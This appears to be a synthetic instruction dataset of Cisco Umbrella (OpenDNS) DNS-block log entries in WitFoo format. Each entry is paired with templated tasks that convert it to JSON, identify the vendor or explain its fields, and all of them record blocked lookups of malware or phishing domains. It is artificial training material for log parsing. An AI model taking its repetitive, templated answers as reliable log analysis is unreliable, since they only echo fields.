WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"131.83.161.58","externalIp":"219.46.163.18","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"131.83.161.58\",\"externalIp\":\"219.46.163.18\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"nighthawk\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T20:29:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "131.83.161.58",
"serverIP": "219.46.163.18",
"userName": "nighthawk"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"131.83.161.58","externalIp":"219.46.163.18","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"131.83.161.58","externalIp":"219.46.163.18","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T20:29:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 131.83.161.58
serverIP: 219.46.163.18
userName: nighthawk | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"202.101.178.238","externalIp":"171.242.144.40","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"202.101.178.238\",\"externalIp\":\"171.242.144.40\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T20:29:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "202.101.178.238",
"serverIP": "171.242.144.40",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"202.101.178.238","externalIp":"171.242.144.40","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"202.101.178.238","externalIp":"171.242.144.40","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T20:29:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 202.101.178.238
serverIP: 171.242.144.40
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"33.165.95.100","externalIp":"79.177.129.194","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "rum.browser-intake-foxbusiness.com",
"message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"33.165.95.100\",\"externalIp\":\"79.177.129.194\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "rum.browser-intake-foxbusiness.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-03-30T16:39:53.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "33.165.95.100",
"serverIP": "79.177.129.194",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"33.165.95.100","externalIp":"79.177.129.194","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"33.165.95.100","externalIp":"79.177.129.194","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: rum.browser-intake-foxbusiness.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: rum.browser-intake-foxbusiness.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-03-30T16:39:53.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 33.165.95.100
serverIP: 79.177.129.194
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"156.223.20.130","externalIp":"62.242.34.199","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "rum.browser-intake-foxbusiness.com",
"message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"156.223.20.130\",\"externalIp\":\"62.242.34.199\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "rum.browser-intake-foxbusiness.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-03-30T16:39:53.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "156.223.20.130",
"serverIP": "62.242.34.199",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"156.223.20.130","externalIp":"62.242.34.199","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"156.223.20.130","externalIp":"62.242.34.199","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: rum.browser-intake-foxbusiness.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: rum.browser-intake-foxbusiness.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-03-30T16:39:53.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 156.223.20.130
serverIP: 62.242.34.199
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"97.237.106.37","externalIp":"16.9.44.15","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "rum.browser-intake-foxbusiness.com",
"message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"97.237.106.37\",\"externalIp\":\"16.9.44.15\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "rum.browser-intake-foxbusiness.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-03-30T16:39:53.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "97.237.106.37",
"serverIP": "16.9.44.15",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"97.237.106.37","externalIp":"16.9.44.15","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"97.237.106.37","externalIp":"16.9.44.15","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: rum.browser-intake-foxbusiness.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: rum.browser-intake-foxbusiness.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-03-30T16:39:53.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 97.237.106.37
serverIP: 16.9.44.15
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"135.100.169.50","externalIp":"88.219.150.243","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "rum.browser-intake-foxbusiness.com",
"message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"135.100.169.50\",\"externalIp\":\"88.219.150.243\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "rum.browser-intake-foxbusiness.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-03-30T16:39:53.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "135.100.169.50",
"serverIP": "88.219.150.243",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"135.100.169.50","externalIp":"88.219.150.243","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"135.100.169.50","externalIp":"88.219.150.243","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: rum.browser-intake-foxbusiness.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: rum.browser-intake-foxbusiness.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-03-30T16:39:53.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 135.100.169.50
serverIP: 88.219.150.243
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"109.110.10.199","externalIp":"197.204.252.202","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "fructed-vulgarizers-mixology.click",
"message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"109.110.10.199\",\"externalIp\":\"197.204.252.202\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "fructed-vulgarizers-mixology.click",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T10:40:30.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "109.110.10.199",
"serverIP": "197.204.252.202",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"109.110.10.199","externalIp":"197.204.252.202","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
